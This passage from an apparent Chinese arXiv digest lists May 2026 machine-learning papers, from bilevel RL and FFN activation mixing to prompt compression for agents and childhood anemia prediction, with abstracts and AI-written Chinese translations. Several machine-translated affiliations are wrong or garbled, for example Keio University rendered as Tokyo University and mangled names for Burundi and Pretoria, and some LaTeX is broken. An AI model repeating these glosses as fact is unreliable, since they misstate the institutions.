NBA parameters).

2605.26654 2026-05-27 cs.LG cs.AI math.OC stat.ML 版本更新

Bilevel Optimization over Saddle Points of Zero-Sum Markov Games

零和马尔可夫博弈鞍点上的双层优化

Zihao Zheng, Irwin King, Songtao Lu

发表机构 * Shun Hing Institute of Advanced Engineering, The Chinese University of Hong Kong(香港中文大学先进工程学院) Department of Computer Science and Engineering, The Chinese University of Hong Kong(香港中文大学计算机科学与工程系)

AI总结 针对下层为零和马尔可夫博弈的双层优化问题,提出基于惩罚的Nikaido-Isoda下降-上升方法(PANDA),避免计算超梯度且无需二阶信息,在无凸性假设下收敛到平稳点,达到与单策略下层MDP双层RL相当的最优速率。

Comments Accepted to the International Conference on Machine Learning (ICML 2026)

详情
AI中文摘要

强化学习(RL)通常具有层次结构,其中上层(UL)学习器选择模型参数,下层(LL)决策过程做出响应,自然形成双层优化问题。大多数现有的双层RL方法假设下层为单策略马尔可夫决策过程(MDP),因此无法捕捉激励设计等应用中出现的竞争结构,其中多个策略相互交互。我们研究了下层问题为正则化极小极大零和马尔可夫博弈、上层目标通过下层博弈诱导的鞍点均衡进行优化的双层优化问题。在这项工作中,我们提出了惩罚增强的Nikaido-Isoda下降-上升(PANDA),一种基于Nikaido-Isoda函数的惩罚一阶策略梯度方法。通过利用极小极大博弈结构,PANDA避免了计算上层超梯度,且不需要二阶信息。我们证明了PANDA在无需对上层或下层目标做凸性假设的情况下收敛到平稳点。此外,PANDA在$ ilde{\mathcal{O}}(ε^{-1})$次迭代内达到$ε$-平稳点,样本复杂度为$ ilde{\mathcal{O}}(ε^{-3})$,与单策略下层MDP的双层RL的最佳已知速率相匹配。实验表明PANDA优于密切相关基线方法。

英文摘要

Reinforcement learning (RL) often has a hierarchical structure, where an upper-level (UL) learner selects model parameters and a lower-level (LL) decision-making process responds, naturally leading to a bilevel optimization problem. Most existing bilevel RL methods assume a single-policy LL Markov decision process (MDP), and therefore fail to capture competitive structures arising in applications such as incentive design, where multiple policies interact. We study bilevel optimization problems in which the LL problem is a regularized min-max zero-sum Markov game and the UL objective is optimized through the saddle-point equilibrium induced by the LL game. In this work, we propose penalty-augmented Nikaido-Isoda descent-ascent (PANDA), a penalty-based first-order policy-gradient method based on the Nikaido-Isoda function. By exploiting the min-max game structure, PANDA avoids computing UL hypergradients and does not require second-order information. We prove that PANDA converges to stationary points without convexity assumptions on either the UL or LL objectives. Moreover, PANDA reaches an $ε$-stationary point in $\tilde{\mathcal{O}}(ε^{-1})$ iterations with sample complexity $\tilde{\mathcal{O}}(ε^{-3})$, matching the best-known rates for bilevel RL with single-policy LL MDPs. Experiments demonstrate the superior performance of PANDA over closely related baselines.

2605.26647 2026-05-27 cs.LG cs.AI stat.ML 版本更新

More Expressive Feedforward Layers: Part I. Token-Adaptive Mixing of Activations

更具表达力的前馈层:第一部分。激活的令牌自适应混合

Mingze Wang, Jinbo Wang, Yikuan Xia, Kai Shen, Shu Zhong

发表机构 * Peking University(北京大学)

AI总结 提出令牌自适应激活混合(MoA)和可学习激活(LA)方法,通过轻量级输入相关门混合多个激活函数,在理论和实验上证明其比固定激活FFN具有更强的表达能力和更优的缩放行为。

Comments 31 pages

详情
AI中文摘要

前馈网络(FFN)层在基于Transformer的大语言模型(LLMs)中占据了大部分参数和非线性表达能力。尽管从ReLU和GELU发展到门控变体如SwiGLU,大多数FFN设计仍使用单一固定激活函数,对所有令牌应用相同的非线性变换。在这项工作中,我们提出了激活混合(MoA),一种令牌自适应的FFN设计,它使用轻量级输入相关门混合一个激活函数字典,同时共享相同的线性投影。作为输入无关的对应,我们还引入了可学习激活(LA),它为ReLU型和SwiGLU型FFN形成激活函数的线性组合。理论上,我们在固定激活FFN、LA和MoA之间建立了严格的有限宽度表达分离:LA严格包含固定激活FFN,而MoA严格包含LA,额外的表达能力来自于输入相关的非线性混合。实验上,我们通过在不同令牌预算、优化器和学习率调度下,对0.12B到2B参数的密集和MoE语言模型进行广泛的预训练实验来评估MoA。与调整良好的基线相比,MoA始终获得更低的最终损失,并表现出更有利的缩放行为,且参数和计算开销极小。这些结果表明,令牌自适应激活混合是提高LLMs中FFN表达能力的一种简单而有效的机制。

英文摘要

Feedforward network (FFN) layers account for a large fraction of parameters and nonlinear expressivity in Transformer-based large language models (LLMs). Despite the evolution from ReLU and GELU to gated variants such as SwiGLU, most FFN designs still use a single fixed activation function, applying the same nonlinear transformation to all tokens. In this work, we propose Mixture of Activations (MoA), a token-adaptive FFN design that mixes a dictionary of activation functions using lightweight input-dependent gates while sharing the same linear projections. As an input-independent counterpart, we also introduce learnable activations (LA), which form linear combinations of activation functions for both ReLU-type and SwiGLU-type FFNs. Theoretically, we establish strict finite-width expressive separations among fixed-activation FFNs, LA, and MoA: LA strictly contains fixed-activation FFNs, while MoA strictly contains LA, with the additional expressivity arising from input-dependent nonlinear hybridization. Empirically, we evaluate MoA through extensive pre-training experiments on dense and MoE language models ranging from 0.12B to 2B parameters under different token budgets, optimizers, and learning rate schedules. MoA consistently achieves lower terminal loss and exhibits more favorable scaling behavior than well-tuned baselines, with minimal parameter and computational overhead. These results suggest that token-adaptive activation mixing is a simple and effective mechanism for improving FFN expressivity in LLMs.

2605.26646 2026-05-27 cs.AI cs.CL cs.MA 版本更新

UnityMAS-O: A General RL Optimization Framework for LLM-Based Multi-Agent Systems

UnityMAS-O: 基于LLM的多智能体系统的通用强化学习优化框架

Yiqun Chen, Wei Yang, Erhan Zhang, Shijie Wang, Qi Liu, Zechun Niu, Bin Zhang, Haitao Li, Rui Li, Lingyong Yan, Jinyuan Feng, Biqing Qi, Xiaochi Wei, Yan Gao, Yi Wu, Yao Hu, Jiaxin Mao

发表机构 * Renmin University of China(中国人民大学) Xiaohongshu Inc.(小红书公司)

AI总结 提出UnityMAS-O框架,将多智能体工作流作为优化单元,通过逻辑角色、图轨迹、用户定义奖励和智能体-模型映射四个核心对象解耦逻辑与物理参数,支持灵活的参数共享和奖励分配,在检索增强问答、迭代搜索和反思代码生成任务上验证了多智能体RL对手动工作流的提升效果。

详情
AI中文摘要

基于LLM的多智能体系统将复杂任务分解为交互角色,但大多数仍通过提示、工具和控制规则手动编排,智能体很少通过统一的强化学习接口进行优化。现有的RL后训练框架主要针对单策略优化,缺乏对用户定义的多智能体工作流、结构化交互、角色特定信用分配和可配置参数共享的抽象。我们提出了UnityMAS-O,一个用于基于LLM的多智能体系统的通用RL优化框架。UnityMAS-O将完整工作流视为优化单元,而非单个响应或策略轨迹。它通过四个核心对象表示工作流:逻辑智能体角色、图轨迹、用户定义奖励和智能体-模型映射。这将逻辑智能体与物理模型参数解耦,支持完全共享、完全分离和部分共享,奖励在角色、轮次和轨迹级别分配。UnityMAS-O通过基于Ray的星形拓扑运行时扩展了verl。中央控制器执行工作流、调用工具、记录结构化轨迹并组装奖励;模型本地工作器组负责轨迹生成、缓冲、优势计算和分布式PPO风格更新。用户可以定义智能体、工作流、模型映射和奖励,而无需重写优化基础设施。我们在检索增强问答、迭代智能体搜索和反思代码生成上实例化了UnityMAS-O。在Natural Questions、HotpotQA和保留代码任务上,多智能体RL在优化后改进了手动指定的工作流,对于较小模型和严格代码全通过指标尤其有较大提升。这些结果表明,UnityMAS-O可以作为可复用基础,将多样化的基于LLM的多智能体工作流转化为可训练的多智能体RL系统。

英文摘要

LLM-based multi-agent systems decompose complex tasks into interacting roles, but most remain manually orchestrated by prompts, tools, and control rules, while agents are rarely optimized through a unified reinforcement learning interface. Existing RL post-training frameworks mainly target single-policy optimization and lack abstractions for user-defined multi-agent workflows, structured interaction, role-specific credit assignment, and configurable parameter sharing. We present UnityMAS-O, a general RL optimization framework for LLM-based multi-agent systems. UnityMAS-O treats the complete workflow as the optimization unit, rather than a single response or policy trajectory. It represents workflows through four first-class objects: logical agent roles, graph trajectories, user-defined rewards, and agent--model mappings. This decouples logical agents from physical model parameters, supporting full sharing, full separation, and partial sharing, with rewards assigned at role, turn, and trajectory levels. UnityMAS-O extends verl with a Ray-based star-topology runtime. A central controller executes workflows, invokes tools, records structured trajectories, and assembles rewards; model-local worker groups handle rollout, buffering, advantage computation, and distributed PPO-style updates. Users can define agents, workflows, model mappings, and rewards without rewriting the optimization infrastructure. We instantiate UnityMAS-O on retrieval-augmented QA, iterative agentic search, and reflective code generation. Across Natural Questions, HotpotQA, and held-out code tasks, multi-agent RL improves manually specified workflows after optimization, with especially large gains for smaller models and strict code all-passed metrics. These results show that UnityMAS-O can serve as a reusable substrate for converting diverse LLM-based multi-agent workflows into trainable multi-agent RL systems.

2605.26636 2026-05-27 cs.CV cs.AI 版本更新

JetViT: Efficient High-Resolution Vision Transformer with Post-Training Attention Search

JetViT: 高效高分辨率视觉Transformer与训练后注意力搜索

Dongyun Zou, Zhuoyang Zhang, Junyu Chen, Wenkun He, Qinhe Peng, Hanrong Ye, Yao Lu, Hongxu Yin, Yu Wang, Song Han, Han Cai

发表机构 * MIT(麻省理工学院) University of Pennsylvania(宾夕法尼亚大学) NVIDIA(NVIDIA公司) Physical Intelligence(物理智能)

AI总结 提出JetViT混合架构视觉Transformer,通过训练后注意力搜索将预训练全注意力ViT转换为高效混合注意力变体,在高分辨率图像上实现更高推理效率且不损失精度。

Comments Accepted to CVPR 2026 Findings

详情
AI中文摘要

我们介绍了JetViT,一种新颖的混合架构视觉Transformer(ViT)模型系列,它在匹配最先进的全注意力视觉基础模型精度的同时,在高分辨率图像上实现了显著更高的推理效率。我们方法的核心是训练后注意力搜索,这是一种训练后加速框架,通过识别并将冗余的全注意力块替换为线性注意力或窗口注意力块,将预训练的全注意力ViT转换为高效的混合注意力变体。通过继承基础模型的MLP和注意力权重,训练后注意力搜索通过三个关键步骤高效探索架构设计空间:(1)优化线性注意力块设计;(2)找到线性注意力块和窗口注意力块的最佳组合;(3)识别并保留关键的全注意力块。我们在两个代表性的高分辨率视觉基础模型DINOv3和DepthAnythingV2上评估了JetViT。在NVIDIA H100 GPU上,JetViT在不牺牲精度的情况下实现了高达1.79倍的吞吐量提升和高达44.81%的延迟降低。我们将很快发布我们的代码和加速后的ViT模型。

英文摘要

We introduce JetViT, a novel family of hybrid-architecture Vision Transformer (ViT) models that match the accuracy of state-of-the-art full-attention vision foundation models while achieving substantially higher inference efficiency on high-resolution images. At the core of our approach is Post-Training Attention Search, a post-training acceleration framework that converts pre-trained full-attention ViTs into efficient hybrid-attention variants by identifying and replacing redundant full-attention blocks with linear or window-attention blocks. By inheriting the MLP and attention weights from the base model, Post-Training Attention Search efficiently explores the architectural design space through three key steps: (1) optimizing the linear-attention block design; (2) finding the best combination of linear-attention and window-attention blocks; and (3) identifying and preserving critical full-attention blocks. We evaluate JetViT on two representative high-resolution vision foundation models, DINOv3 and DepthAnythingV2. On the NVIDIA H100 GPU, JetViT achieves up to 1.79x higher throughput and up to 44.81% lower latency without sacrificing accuracy. We will release our code and accelerated ViT models soon.

2605.26628 2026-05-27 cs.AI 版本更新

Tail-Aware HiFloat4: W4A4 Post-Training Quantization for Wan2.2

Tail-Aware HiFloat4: 面向Wan2.2的W4A4训练后量化

Zhanfeng Feng, Shuai Guo, Xin Di, Long Peng, Yang Cao, Zhengjun Zha

发表机构 * University of Science and Technology of China(中国科学技术大学)

AI总结 提出Tail-Aware HiFloat4方法,通过感知激活尾部的百分位校准和紧凑PTQ状态恢复,在HiFloat4数值格式下对Wan2.2进行W4A4训练后量化,减少罕见校准异常值的影响。

详情
AI中文摘要

本报告描述了Tail-Aware HiFloat4,这是我们提交给低位文本到视频生成量化挑战的方法。我们的方法将公开的ViDiT-Q训练后量化流水线适配到Wan2.2,并采用HiFloat4数值格式。我们对Wan2.2两个Transformer模块中的主要线性层进行W4A4 HiFloat4伪量化,将数值敏感的边界模块保持高精度,并引入一个感知激活尾部的百分位校准模块用于通道掩码构建。结合紧凑的PTQ状态恢复,该设计减少了罕见校准异常值的影响,同时保持运行时HiFloat4算术和采样流水线不变。

英文摘要

This report describes Tail-Aware HiFloat4, our submission to the low-bit text-to-video generation quantization challenge. Our method adapts the public ViDiT-Q post-training quantization pipeline to Wan2.2 under the HiFloat4 numerical format. We quantize the main linear layers in both Wan2.2 transformer modules with W4A4 HiFloat4 fake quantization, keep numerically sensitive boundary modules in high precision, and introduce an activation-tail-aware percentile calibration module for channel-mask construction. Together with compact PTQ-state restoration, this design reduces the influence of rare calibration outliers while keeping the runtime HiFloat4 arithmetic and sampling pipeline unchanged.

2605.26621 2026-05-27 cs.CV cs.AI 版本更新

MedVol-R1: Reward-Driven Evidence Grounding for Volumetric Reasoning Segmentation

MedVol-R1:基于奖励驱动的证据基础用于体积推理分割

Zichun Wang, Hairong Shi, Bingzheng Wei, Yan Xu, Zihua Wang

发表机构 * School of Biological Science and Medical Engineering, Beihang University, Beijing, China(生物科学与医学工程学院,北京航空航天大学) Center for Information and Computer Science, School of Science for Open and Environmental Systems, Graduate School of Science and Technology, Keio University, Kanagawa, Japan(信息与计算机科学中心,开放与环境系统科学学院,科技研究生学校,东京大学,神奈川,日本) Bytedance Inc., China(字节跳动公司,中国) Tsinghua University, Beijing, China(清华大学,北京,中国)

AI总结 提出MedVol-R1框架,通过强化学习将临床推理解耦为可验证的2D证据锚点,再传播为3D掩膜,实现体积推理分割,在多个基准上达到最优性能。

详情
AI中文摘要

体积推理分割(VRS)旨在根据自由形式的临床查询在3D医学扫描中分割目标区域,其中所指对象通常是隐含的,需要医学知识和体积基础推理。现有方法通常依赖专门的分割标记将语言与掩膜解码连接起来,但这种耦合将决策过程压缩为不透明的潜在表示,限制了可解释性和对多样化叙述表达的泛化能力。在本文中,我们提出MedVol-R1,一种基于强化学习的VRS框架,明确地将证据基础与体积描绘解耦:LVLM将临床推理定位到可验证的2D证据锚点(关键轴向切片和2D边界框),然后由冻结的MedSAM2模块将其传播为连贯的3D掩膜。我们使用冷启动监督微调后接GRPO来训练MedVol-R1,并由多组件奖励引导,该奖励鼓励信息性证据选择、准确的2D空间定位和跨切片体积连贯性,无需昂贵的思维链注释。在M3D-Seg基准的CT-ORG、AbdomenCT-1K和KiTS23上的实验表明,MedVol-R1一致优于强基线并达到最先进性能,强化学习相比纯监督微调提供了明显增益。

英文摘要

Volumetric Reasoning Segmentation (VRS) aims to segment a target region in a 3D medical scan from a free-form clinical query, where the referent is often implicit and requires both medical knowledge and volume-grounded reasoning. Existing methods typically rely on specialized segmentation tokens to connect language with mask decoding, but this coupling collapses the decision process into opaque latent representations, limiting interpretability and generalization to diverse narrative expressions. In this paper, we present MedVol-R1, a reinforcement learning-based framework for VRS that explicitly decouples evidence grounding from volumetric delineation: the LVLM grounds clinical reasoning to a verifiable 2D evidence anchor (key axial slice and 2D bounding boxes), which is then propagated into a coherent 3D mask by a frozen MedSAM2 module. We train MedVol-R1 with cold-start supervised fine-tuning followed by GRPO, guided by a multi-component reward that encourages informative evidence selection, accurate 2D spatial grounding, and cross-slice volumetric coherence, without requiring costly chain-of-thought annotations. Experiments on CT-ORG, AbdomenCT-1K, and KiTS23 from the M3D-Seg benchmark demonstrate that MedVol-R1 consistently outperforms strong baselines and achieves state-of-the-art performance, with reinforcement learning providing clear gains over pure supervised fine-tuning.

2605.26615 2026-05-27 cs.AI 版本更新

FAST-GOAL: Fast and Efficient Global-local Object Alignment Learning

FAST-GOAL: 快速高效的全局-局部对象对齐学习

Hyungyu Choi, Young Kyun Jang, Chanho Eom

发表机构 * Department of Virtual Convergence, Graduate School of Advanced Imaging Science, Multimedia & Films (GSAIM), Chung-Ang University(虚拟融合系,高级影像科学研究生院,多媒体与电影系(GSAIM), Chung-Ang 大学)

AI总结 提出FAST-GOAL微调方法,通过全局-局部语义对齐增强CLIP处理长文本的能力,包括快速局部图像-句子匹配和基于token相似性的学习,并在GLIT100k数据集上训练,在长/短描述数据集上均取得显著提升。

Comments 21 pages, 8 figures, IEEE/TIP 2026 accepted

详情
AI中文摘要

视觉-语言模型如CLIP在图像和文本对齐方面表现出色,但由于在简短标题上预训练,它们通常难以处理冗长详细的文本描述。我们提出FAST-GOAL(快速高效的全局-局部对象对齐学习),一种高效的微调方法,通过全局-局部语义对齐增强CLIP处理长文本的能力。我们的方法包含两个关键组件。首先,快速局部图像-句子匹配(FLISM)通过目标检测和空间划分高效提取局部图像区域,然后将其与对应句子匹配。其次,基于token相似性的学习(TSL)最大化图像中特定区域的patch token与其对应区域嵌入之间的相似性,并将相同原理应用于文本,从而增强模型捕获细节对应关系的能力。此外,我们引入了GLIT100k数据集,该数据集提供全局图像-长描述对和上下文派生的局部对,其中局部描述从全局描述中提取以保持语义连贯性。通过在长描述数据集(DOCCI, DCI)和短描述数据集(MSCOCO, Flickr30k)上的大量实验,我们证明FAST-GOAL相比基线取得了显著改进,使CLIP能够有效适应详细文本描述,同时保持计算效率。

英文摘要

Vision-language models such as CLIP have shown impressive capabilities in aligning images and text, but they often struggle with lengthy and detailed text descriptions due to pre-training on short and concise captions. We present FAST-GOAL (Fast and Efficient Global-local Object Alignment Learning), an efficient fine-tuning method that enhances ability of CLIP to handle lengthy text through global-local semantic alignment. Our method consists of two key components. First, Fast Local Image-Sentence Matching (FLISM) efficiently extracts local image regions through object detection and spatial division, then matches them with corresponding sentences. Second, Token Similarity-based Learning (TSL) maximizes the similarity between patch tokens from specific regions in the image and their corresponding region embeddings, applying the same principle to text, which enhances the ability of the model to capture detailed correspondences. Additionally, we introduce GLIT100k, a dataset that provides both global image-lengthy caption pairs and context-derived local pairs, where local descriptions are extracted from global captions to maintain semantic coherence. Through extensive experiments on long caption datasets (DOCCI, DCI) and short caption datasets (MSCOCO, Flickr30k), we demonstrate that FAST-GOAL achieves significant improvements over baselines, enabling effective adaptation of CLIP to detailed textual descriptions while maintaining computational efficiency.

2605.26606 2026-05-27 cs.LG cs.AI 版本更新

Spend Your Rollouts Where It Counts: Rollout Allocation for Group-Based RL Post-Training

将你的展开用在关键处:基于组强化学习后训练的展开分配

Woojeong Kim, Ziyi Yang, Jing Nathan Yan, Jialu Liu

发表机构 * Cornell University(康奈尔大学)

AI总结 提出 Pilot-Commit 框架,通过预算感知的展开分配策略,优先将计算资源分配给高信息量的提示,从而在组策略优化中减少采样成本并加速收敛。

详情
AI中文摘要

强化学习(RL)是后训练大型语言模型的主要范式。然而,在在线、在策略设置中,展开生成主导了训练的计算成本。基于组的策略优化方法对每个提示计算多个展开的优势,但它们不加区分地将预算分配给奖励分布崩溃的提示,将昂贵的展开浪费在可忽略的学习信号上。我们证明,基于组的更新在高奖励方差区域最为有效。由于策略在整个训练过程中演变,提示的信息量必须在线估计而非预先计算,但穷举评估每个提示在计算上不可行。我们引入了 Pilot-Commit,一个用于基于组 RL 后训练的预算感知展开分配框架。Pilot-Commit 将提示评估与利用解耦:一个试点阶段使用预算的一部分估计每个提示的信息量,然后将剩余的展开分配给高杠杆提示,同时跳过低信号提示。在多个数学推理基准和从 1.5B 到 14B 参数的模型规模上,Pilot-Commit 以显著更低的采样成本匹配基线准确率,在累积展开中达到目标准确率的速度比 GRPO 快高达 $1.9 imes$,比 DAPO 快高达 $4.0 imes$。

英文摘要

Reinforcement learning (RL) is the dominant paradigm for post-training large language models. However, in the online, on-policy setting, rollout generation dominates the computational cost of training. Group-based policy optimization methods compute advantages from multiple rollouts per prompt, yet they indiscriminately allocate budget to prompts with collapsed reward distributions, wasting expensive rollouts on negligible learning signals. We demonstrate that group-based updates are most effective in regimes of high reward variance. Since the policy evolves throughout training, prompt informativeness must be estimated online rather than precomputed, but exhaustively evaluating every prompt is computationally prohibitive. We introduce Pilot-Commit, a budget-aware rollout allocation framework for group-based RL post-training. Pilot-Commit decouples prompt evaluation from exploitation: a pilot stage estimates per-prompt informativeness using a fraction of the budget, and the remaining rollouts are allocated to high-leverage prompts while low-signal prompts are skipped. Across multiple math reasoning benchmarks and model scales from 1.5B to 14B parameters, Pilot-Commit matches baseline accuracy with significantly lower sampling costs, reaching target accuracy up to $1.9\times$ faster than GRPO and $4.0\times$ faster than DAPO in cumulative rollouts.

2605.26600 2026-05-27 cs.LG cs.AI 版本更新

Geometry-Aware Contrastive Learning for Few-Shot Automatic Modulation Recognition

几何感知对比学习用于少样本自动调制识别

Guanqun Zhao, Yitong Liu, Jiaxuan Fang, Yufei Mao, Hongwen Yang

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学)

AI总结 提出动态一致性对比学习框架,通过虚拟对抗增强和语义一致性损失解决自监督学习中的各向同性增强、频谱不稳定和语义漂移问题,在少样本设置下提升自动调制识别准确率。

详情
AI中文摘要

标准的自动调制识别自监督学习面临无效的各向同性增强、频谱不稳定性和语义漂移等挑战。为解决这些问题,我们提出了动态一致性对比学习,一种几何感知框架,将虚拟对抗增强与语义一致性损失相结合。我们提供的理论分析表明,该策略作为编码器的隐式频谱正则化器,能够实现稳定的流形探索。此外,我们的信号自适应Swin骨干网络采用固定窗口注意力,通过限制注意力局部性提高了结构稳定性,而混合知识融合模块则利用物理先验锚定表示。在RML基准上的实验表明,DyCo-CL在1-shot设置下相比先前方法获得了6.27%的准确率提升。

英文摘要

Standard Self-Supervised Learning (SSL) for Automatic Modulation Recognition (AMR) struggles with ineffective isotropic augmentations, spectral instability, and semantic drift. To address these challenges, we propose Dynamic-Consistency Contrastive Learning (DyCo-CL), a geometry-aware framework that couples Virtual Adversarial Augmentation (VAA) with a semantic consistency loss. We provide a theoretical analysis indicating that this strategy acts as an implicit spectral regularizer for the encoder, enabling stable manifold exploration. Complementing this, our Signal-Adaptive Swin Backbone with fixed-window attention improves structural stability by constraining attention locality, while a Hybrid Knowledge Fusion module anchors representations with physical priors. Experiments on RML benchmarks show that DyCo-CL achieves a 6.27% accuracy gain in 1-shot settings over prior methods.

2605.26596 2026-05-27 cs.AI 版本更新

AGORA: Adapter-Grounded Observation-Action Retention for Inference-Free Prompt Compression in LLM Agents

AGORA: 基于适配器接地观察-动作保留的LLM智能体无推理提示压缩

Haoran Zhang, Zhaohua Sun

发表机构 * AI Agent Technologies (Hong Kong) Limited(人工智能代理技术(香港)有限公司) Department of Mechanical Engineering, The University of Hong Kong(香港大学机械工程系)

AI总结 针对LLM智能体,提出AGORA无推理步骤级压缩器,通过结构提示解析器、格式关键内容保留和125M参数相关性评分器,在9个测试单元中8个保持≥75%的无压缩性能。

Comments 10 pages, 2 figures. Code and data: https://github.com/ranranrannervous/agoracompression

详情
AI中文摘要

广泛用于通用LM上下文的token级抽取式压缩器在结构上不适合LLM智能体:在跨越两个独立token级方法家族的17个(环境、骨干、方法)单元中,尽管实现了1.3-13.3倍的压缩,每个单元的均值奖励≤0.05。我们将这种失败模式命名为动作语法破坏——携带动作语义的token(标识符、括号、动作动词)正是那些自信息排名最低的token,因此通用压缩器可靠地移除它们,环境拒绝剩余部分。诊断指向步骤粒度压缩。我们引入AGORA,一种无推理的步骤级压缩器,结合结构提示解析器、格式和时效关键内容的始终保留底线,以及一个在反事实下一步动作变化标签上训练的125M参数相关性评分器(约2ms/步,零每步LLM开销)。在比较的无推理和基于LLM的方法中,AGORA是唯一在9个单元中的8个中保持≥75%无压缩性能的方法(唯一的例外为73%);四路组件消融将结构底线隔离为主要的性能杠杆,而学习到的评分器是单一固定保留比率下实现1.0-11.5倍自适应端到端压缩的来源。

英文摘要

The token-level extractive compressors widely used for general LM context are structurally inappropriate for LLM agents: across 17 (env, backbone, method) cells spanning two independent token-level method families, every cell collapses to mean reward <= 0.05 despite 1.3-13.3x realized compression. We name and characterize this failure mode as action-grammar destruction -- the tokens carrying action semantics (identifiers, brackets, action verbs) are exactly those self-information ranks lowest, so a general-purpose compressor reliably removes them and the environment rejects the residual. The diagnosis points to step-granularity compression. We introduce AGORA, an inference-free step-level compressor combining a structural prompt parser, an always-keep floor for format- and recency-critical content, and a 125M-parameter relevance scorer trained on counterfactual next-action-change labels (~2ms/step, zero per-step LLM toll). Across the compared inference-free and LLM-based methods, AGORA is the only one retaining >= 75% uncompressed performance in 8 of 9 cells (with the lone exception at 73%); a four-way component ablation isolates the structural floor as the dominant quality lever and the learned scorer as the source of 1.0-11.5x adaptive end-to-end compression from a single fixed keep ratio.

2605.26590 2026-05-27 cs.CY cs.AI 版本更新

Examining the Challenges of Intellectual Property in AI-Generated Productions

审视人工智能生成作品中的知识产权挑战

Ali Mazhar, Mohammad Zare, Marjan Veysi

AI总结 本文通过比较伊朗、欧盟、英国和美国的法律框架,分析人工智能生成作品在知识产权保护中的所有权归属与法律挑战,并提出修订法律或引入新型权利的建议。

详情
Journal ref
New Researches in the Smart City, Vol. 3, No. 4, Summer 2025
AI中文摘要

随着能够自主生成艺术、文学、音乐作品甚至发明而无需直接人工干预的人工智能系统的进步,知识产权制度面临前所未有的问题和挑战。最关键的问题涉及在缺乏人类创作者的情况下道德和经济权利的所有权,以及如何为这些产出提供法律保护。本文首先回顾了这一领域的理论基础和现有文献,然后比较研究了伊朗的法律框架,如1969年《作者、作曲家和艺术家权利保护法》和《专利和商标注册法》,以及其他法律体系,包括欧盟、英国和美国。此外,还分析了关于人工智能生成作品知识产权的现有法律观点及相关执法挑战。研究结果揭示了当前伊朗法律框架内的重大监管空白。为了在促进创新与保护人类创造力之间取得平衡,修订现有法律并引入新方法,例如为人工智能生成作品定义特定的知识产权或指定相关人类代理人之间的所有权,似乎是必要的。

英文摘要

With the advancement of artificial intelligence systems capable of autonomously generating artistic, literary, musical works, and even inventions without direct human intervention, the intellectual property (IP) regime faces unprecedented questions and challenges. The most critical issue concerns the ownership of moral and economic rights in the absence of a human creator, and how such outputs can be granted legal protection. This paper first reviews the theoretical foundations and existing literature in this domain, then comparatively examines Iranian legal frameworks such as the 1969 Law for the Protection of Authors, Composers, and Artists Rights and the Patent and Trademark Registration Law-alongside other legal systems, including the European Union, the United Kingdom, and the United States. Furthermore, existing legal perspectives on the intellectual property of AI-generated works and the related enforcement challenges are analyzed. The findings reveal significant regulatory gaps within the current Iranian legal framework. To balance the promotion of innovation with the preservation of human creativity, revising existing laws and introducing novel approaches such as defining a specific intellectual property right for AI-generated works or designating ownership among associated human agents appears to be essential.

2605.26589 2026-05-27 cs.LG cs.AI stat.ML 版本更新

Few-shot Cross-country Generalization of Tabular Machine Learning and Foundation Models for Childhood Anemia Prediction under Distribution Shift

分布漂移下儿童贫血预测的表格机器学习与基础模型的少样本跨国家泛化

Yusuf Brima, Marcellin Atemkeng, Lansana Hassim Kallon, David Niyukuri, Antoine Vacavant, Samuel Saidu, Ding-Geng Chen

发表机构 * Department of Mathematics, Rhodes University, South Africa(数学系,罗德斯大学,南非) National Institute for Theoretical and computational Sciences (NITheCS), Stellenbosch, 7600, South Africa(理论与计算科学国家研究所(NITheCS),斯泰伦博斯,7600,南非) Interdisciplinary Research Program in Public Health, University of Burundi, Burundi(公共卫生跨学科研究计划,布恩迪大学,布恩迪) Universite Clermont Auvergne, Clermont Auvergne INP, CNRS, Institut Pascal, Clermont–Ferrand, France(克莱蒙特-奥弗涅大学,克莱蒙特-奥弗涅INP,CNRS,帕西尔研究所,克莱蒙特-费尔南,法国) Department of International Public Health, Liverpool School of Tropical Medicine, Liverpool, UK(国际公共卫生系,利物浦热带医学学校,利物浦,英国) College of Health Solutions, Arizona State University, Phoenix, USA(健康解决方案学院,亚利桑那州立大学,凤凰城,美国) Department of Statistics, University of Pretoria, Pretoria, South Africa(统计系,普里特oria大学,普里特oria,南非)

AI总结 本研究评估了基于Transformer的表格基础模型TabPFN在跨国家、数据稀缺环境下预测儿童贫血的性能,发现其优于经典监督方法,尤其在低数据场景下表现出更好的区分度和校准能力。

详情
AI中文摘要

儿童贫血影响全球约40%的6-59个月儿童,且由异质性因素引起,限制了模型的泛化能力。我们在跨国家和数据稀缺环境下,评估了基于Transformer的表格基础模型与经典监督方法。我们使用了来自非洲、亚洲、拉丁美洲、高加索和中东16个国家的DHS数据(n=68,856)。比较了逻辑回归、XGBoost、LightGBM和TabPFN v2.6。性能通过AUC-ROC、Brier评分和ECE评估。泛化性通过留一国家法(LOCO)、反向LOCO和少样本设置评估。亚组分析包括性别、年龄、居住地、母亲教育和财富。特征重要性通过SHAP估计。TabPFN在低数据场景(<200样本)中优于经典模型,显示出更高的区分度和更好的校准。在各国中,它实现了最低的Brier评分(0.042)和ECE(0.203)。在全数据设置下,AUC-ROC范围为0.59-0.76,模型间差异较小(≤0.05)。LOCO性能稳定(0.58-0.69),受国家背景驱动。反向LOCO显示出不对称的可转移性。亚组性能一致,无系统性人口统计偏差。SHAP识别出儿童年龄、海拔和年龄别身高Z分数为主要预测因子,其次是财富和母亲教育。儿童贫血预测的性能更多由人群变异驱动而非模型选择。TabPFN在低资源环境中通过改进的区分度和校准提供了优势,突显了基础模型作为数据稀缺全球健康预测的有前景工具。

英文摘要

Childhood anemia affects around 40% of children aged 6-59 months globally and arises from heterogeneous factors, limiting model generalizability. We evaluate a transformer-based tabular foundation model against classical supervised methods under cross-country and data-scarce settings. We used DHS data from 16 countries across Africa, Asia, Latin America, the Caucasus, and the Middle East (n=68,856). We compared Logistic Regression, XGBoost, LightGBM, and TabPFN v2.6. Performance was assessed using AUC-ROC, Brier score, and ECE. Generalization was evaluated using leave-one-country-out (LOCO), reverse-LOCO, and few-shot settings. Subgroup analyses included sex, age, residence, maternal education, and wealth. Feature importance was estimated using SHAP. TabPFN outperformed classical models in low-data regimes (<200 samples), showing higher discrimination and better calibration. Across countries, it achieved the lowest Brier score (0.042) and ECE (0.203). Under full-data settings, AUC-ROC ranged from 0.59-0.76 with small between-model differences ($\leq 0.05$). LOCO performance was stable (0.58-0.69), driven by country context. Reverse-LOCO showed asymmetric transferability. Subgroup performance was consistent with no systematic demographic bias. SHAP identified child age, altitude, and height-for-age z-score as dominant predictors, followed by wealth and maternal education. Performance in childhood anemia prediction is driven more by population variation than model choice. TabPFN provides advantages in low-resource settings through improved discrimination and 